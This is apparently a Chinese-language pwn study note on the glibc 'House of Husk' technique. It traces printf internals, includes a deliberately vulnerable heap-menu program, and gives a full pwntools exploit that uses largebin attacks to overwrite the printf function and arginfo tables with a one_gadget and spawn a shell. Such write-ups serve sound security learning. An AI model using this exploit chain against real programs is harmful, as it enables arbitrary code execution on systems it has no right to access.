【我的 PWN 学习手札】House of Husk

House of Husk

House of Husk是利用格式化输出函数如printf、vprintf在打印输出时，会解析格式化字符如%x、%lld从而调用不同的格式化打印方法（函数）。同时C语言还提供了注册自定义格式化字符的方法。注册自定义格式化字符串输出方法，实际上是通过两张保存在全局的表实现的。为此我们以伪装/篡改这两张表为核心目标，劫持函数指针，从而控制程序流。

一、printf调用过程

printf是通过ldbl_strong_alias创建的__printf的别名，__printf又调用了vfprintf

因此printf➡__printf➡vfprintf

// stdio-common/printf.c

int
__printf (const char *format, ...)
{
  va_list arg;
  int done;

  va_start (arg, format);
  done = vfprintf (stdout, format, arg);
  va_end (arg);

  return done;
}

#undef _IO_printf
ldbl_strong_alias (__printf, printf);

vfprintf中预设了进行自定义格式化字符串处理的分支do_positional，其中继续调用printf_positional函数

因此vfprintf➡do_positional➡printf_positional

/* The function itself.  */
int vfprintf(FILE *s, const CHAR_T *format, va_list ap)
{
	...
		/* Use the slow path in case any printf handler is registered.  */
	if (__glibc_unlikely(
							__printf_function_table != NULL || 
							__printf_modifier_table != NULL ||
           		 			__printf_va_arg_table != NULL
           		 		)
       ) // 当三个表之一不为空时，即说明有自定义的格式化字符串处理方法
		goto do_positional;

	/* Process whole format string.  */ //执行默认的格式化打印规则
	do
	{
		...
	} while (*f != L_('\0'));
	/* Unlock stream and return.  */
	goto all_done;
	
	/* Hand off processing for positional parameters.  */
do_positional:
	if (__glibc_unlikely(workstart != NULL))
	{
		free(workstart);
		workstart = NULL;
	}
	done = printf_positional(s, format, readonly_format, ap, &ap_save,
							 done, nspecs_done, lead_str_end, work_buffer,
							 save_errno, grouping, thousands_sep);
all_done:
	...
	return done;
}

printf_positional函数中，检查自定义的格式化操作表，选择自定义格式化字符对应的函数指针，传入参数，完成自定义格式化操作。

因此printf_positional➡__printf_function_table[(size_t)spec](s, &specs[nspecs_done].info, ptr);

static int
printf_positional(_IO_FILE *s, const CHAR_T *format, int readonly_format,
				  va_list ap, va_list *ap_savep, int done, int nspecs_done,
				  const UCHAR_T *lead_str_end,
				  CHAR_T *work_buffer, int save_errno,
				  const char *grouping, THOUSANDS_SEP_T thousands_sep)
{
    ...
	for (const UCHAR_T *f = lead_str_end; *f != L_('\0');
		 f = specs[nspecs++].next_fmt)
	{
		...
		/* Parse the format specifier.  */
		nargs += __parse_one_specmb(f, nargs, &specs[nspecs], &max_ref_arg);
	}
	...
	/* Now walk through all format specifiers and process them.  */
	for (; (size_t)nspecs_done < nspecs; ++nspecs_done)
	{
		...
		/* Fill variables from values in struct.  */
		...

		/* Fill in last information.  */
		...
		/* Maybe the buffer is too small.  */
		...
		/* Process format specifiers.  */
		while (1)
		{
			extern printf_function **__printf_function_table;
			int function_done;

			if (spec <= UCHAR_MAX && __printf_function_table != NULL && __printf_function_table[(size_t)spec] != NULL)
			{
				const void **ptr = alloca(specs[nspecs_done].ndata_args * sizeof(const void *));

				/* Fill in an array of pointers to the argument values.  */
				for (unsigned int i = 0; i < specs[nspecs_done].ndata_args;
					 ++i)
					ptr[i] = &args_value[specs[nspecs_done].data_arg + i];

				/* Call the function.  */
				function_done = __printf_function_table[(size_t)spec](s, &specs[nspecs_done].info, ptr);
				...
			}

		}
		...
	}
all_done:
	...
}

另外，printf_positional➡__parse_one_specmb()➡(*__printf_arginfo_table[spec->info.spec])(&spec->info, 1, &spec->data_arg_type,&spec->size)

size_t
attribute_hidden
__parse_one_specmb (const UCHAR_T *format, size_t posn,
		    struct printf_spec *spec, size_t *max_ref_arg)
{
	...
	if (__builtin_expect (__printf_function_table == NULL, 1)
      	|| spec->info.spec > UCHAR_MAX
      	|| __printf_arginfo_table[spec->info.spec] == NULL
      	/* We don't try to get the types for all arguments if the format
	 	uses more than one.  The normal case is covered though.  If
	 	the call returns -1 we continue with the normal specifiers.  */
      	|| (int) (spec->ndata_args = (*__printf_arginfo_table[spec->info.spec])
				   	(&spec->info, 1, &spec->data_arg_type,
				    	&spec->size)) < 0)
    {
    	...
	}
	...
}

因此不论是__printf_arginfo_table还是__printf_function_table的注册函数都会被调用，这两个地方都可以用作劫持。然而有几点需要注意

__printf_arginfo_table中的函数指针先被调用，__printf_function_table中的函数指针后被调用
一般通过vprintf的__printf_function_table != null触发自定义格式化字符解析的分支
由于"1"和"2"，如果借助__printf_arginfo_table劫持程序流，一般也需要确保__printf_function_table != null
由于"1"和"2"，如果借助__printf_function_table劫持程序流，需要确保__printf_arginfo_table != null，否则会出现错误；而且因此也需要__printf_arginfo_table[spec->info.spec]==null

二、格式化字符处理函数注册机制

既然存在"自定义字符-自定义格式化函数"的映射处理机制，我们不妨看一下注册函数，来帮助我们更好理解，这几张表的作用。

通过在源码项目中查找"__printf_function_table"字符串，可以定位到"stdio-common/reg-printf.c"中的__register_printf_specifier函数

/* Register FUNC to be called to format SPEC specifiers.  */
int __register_printf_specifier(int spec, printf_function converter,
                                printf_arginfo_size_function arginfo)
{
  if (spec < 0 || spec > (int)UCHAR_MAX)
  {
    __set_errno(EINVAL);
    return -1;
  }

  int result = 0;
  __libc_lock_lock(lock);

  if (__printf_function_table == NULL) // 如果为空，说明是第一次注册，开始建表
  {
    __printf_arginfo_table = (printf_arginfo_size_function **)
        // /* Maximum value an `unsigned char' can hold.  (Minimum is 0.)  */
		// #  define UCHAR_MAX	255
        calloc(UCHAR_MAX + 1, sizeof(void *) * 2); 	//创建表，分配一段大小为(UCHAR_MAX + 1) * sizeof(void *) * 2的连续空间
      												//可以存储0x200个(void*)类型数据

    if (__printf_arginfo_table == NULL)
    {
      result = -1;
      goto out;
    }
	// __printf_arginfo_table 占分配空间前0x100个(void*)的空间
    // __printf_function_table占分配空间后0x100个(void*)的空间
    // |__printf_arginfo_table | __printf_function_table|
    // |<--------0x100-------->|<---------0x100-------->| 每个单元大小：sizeof(void*)
    __printf_function_table = (printf_function **)(__printf_arginfo_table + UCHAR_MAX + 1);
  }
	//自定义格式化字符spec与两张表的映射关系即索引关系
  __printf_function_table[spec] = converter;
  __printf_arginfo_table[spec] = arginfo;

out:
  __libc_lock_unlock(lock);

  return result;
}
libc_hidden_def(__register_printf_specifier)
    weak_alias(__register_printf_specifier, register_printf_specifier);


/* Register FUNC to be called to format SPEC specifiers.  */
int
__register_printf_function (int spec, printf_function converter,  // 封装__register_printf_specifier
			    printf_arginfo_function arginfo)
{
  return __register_printf_specifier (spec, converter,
				      (printf_arginfo_size_function*) arginfo);
}
weak_alias (__register_printf_function, register_printf_function)

三、模板题与题解

pwn.c

#include<stdlib.h>
#include <stdio.h>
#include <unistd.h>

char *chunk_list[0x100];

void menu() {
    puts("1. add chunk");
    puts("2. delete chunk");
    puts("3. edit chunk");
    puts("4. show chunk");
    puts("5. exit");
    puts("choice:");
}

int get_num() {
    char buf[0x10];
    read(0, buf, sizeof(buf));
    return atoi(buf);
}

void add_chunk() {
    puts("index:");
    int index = get_num();
    puts("size:");
    int size = get_num();
    chunk_list[index] = malloc(size);
}

void delete_chunk() {
    puts("index:");
    int index = get_num();
    free(chunk_list[index]);
}

void edit_chunk() {
    puts("index:");
    int index = get_num();
    puts("length:");
    int length = get_num();
    puts("content:");
    read(0, chunk_list[index], length);
}

void show_chunk() {
    puts("index:");
    int index = get_num();
    puts(chunk_list[index]);
}

int main() {
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);

    while (1) {
        menu();
        int choice = get_num();
        switch (choice) {
            case 1:
                add_chunk();
                break;
            case 2:
                delete_chunk();
                break;
            case 3:
                edit_chunk();
                break;
            case 4:
                show_chunk();
                break;
            case 5:
                exit(0);
            default:
                printf("invalid choice %d.\n", choice);
        }
    }
}

exp.py

from pwn import *
elf=ELF("./pwn")
libc=ELF("./libc.so.6")
context.arch=elf.arch
context.log_level='debug'
context.os=elf.os
def add(index, size):
    io.sendafter(b"choice:", b"1")
    io.sendafter(b"index:", str(index).encode())
    io.sendafter(b"size:", str(size).encode())

def delete(index):
    io.sendafter(b"choice:", b"2")
    io.sendafter(b"index:", str(index).encode())

def edit(index, content):
    io.sendafter(b"choice:", b"3")
    io.sendafter(b"index:", str(index).encode())
    io.sendafter(b"length:", str(len(content)).encode())
    io.sendafter(b"content:", content)

def show(index):
    io.sendafter(b"choice:", b"4")
    io.sendafter(b"index:", str(index).encode())

io=process("./pwn")

add(0,0x418)
add(1,0x18)
add(2,0x428)
add(3,0x18)
delete(2)
add(10,0x500)

# 泄露heap_base
show(2)
io.recvline()
libc.address=u64(io.recv(6).ljust(8,b'\x00'))-0x1d20b0
success("libc base: "+hex(libc.address))

# 泄露libc_base
edit(2,b'a'*8*2)
show(2)
io.recvline()
io.recvuntil(b'a'*0x10)
heap_base=u64(io.recv(6).ljust(8,b'\x00')) &  ~0xfff
success("heap base: "+hex(heap_base))
edit(2,p64(libc.address+0x1d20b0)*2+p64(heap_base+0x6d0))

# 通过偏移获取两张全局表的位置
__printf_function_table = libc.address + 0x1d3980
__printf_arginfo_table = libc.address+ 0x1d2890

# largebin attack 让__printf_function_table指向一块内存，
# 之后将该内存申请出来在对应应该调用的函数指针位置写入one_gadget
edit(2,p64(0)*3+p64(__printf_function_table-0x20))
delete(0)
add(0,0x100)

'''
0xd3361 execve("/bin/sh", r13, r12)
constraints:
  [r13] == NULL || r13 == NULL || r13 is a valid argv
  [r12] == NULL || r12 == NULL || r12 is a valid envp

0xd3364 execve("/bin/sh", r13, rdx)
constraints:
  [r13] == NULL || r13 == NULL || r13 is a valid argv
  [rdx] == NULL || rdx == NULL || rdx is a valid envp

0xd3367 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL || rsi is a valid argv
  [rdx] == NULL || rdx == NULL || rdx is a valid envp
'''
one_gadgets=[i +libc.address for i in [0xd3361,0xd3364,0xd3367]]
edit(2,p64(libc.address+0x1d20b0)*2+p64(heap_base+0x6d0)*2)
add(2,0x428)

#########################################################
# 发现只写__printf_function_table，而__printf_arginfo_table为空时会在__parse_one_specmb的if判断中崩溃
# 于是这里再次largebin attack让__printf_arginfo_table指向一块堆区域，
# 同时由于堆未写入数据，很容易满足__printf_arginfo_table[spec]=null
add(10,0x300)
add(10,0x418)
add(11,0x18)
add(12,0x428)
add(13,0x18)
delete(12)
add(20,0x500)
edit(12,p64(0)*3+p64(__printf_arginfo_table-0x20))
delete(10)
add(10,0x100)
##########################################################

edit(2,(ord('d')-2)*p64(0)+p64(one_gadgets[0]))

io.sendlineafter(b"choice:",b"~!@")

io.interactive()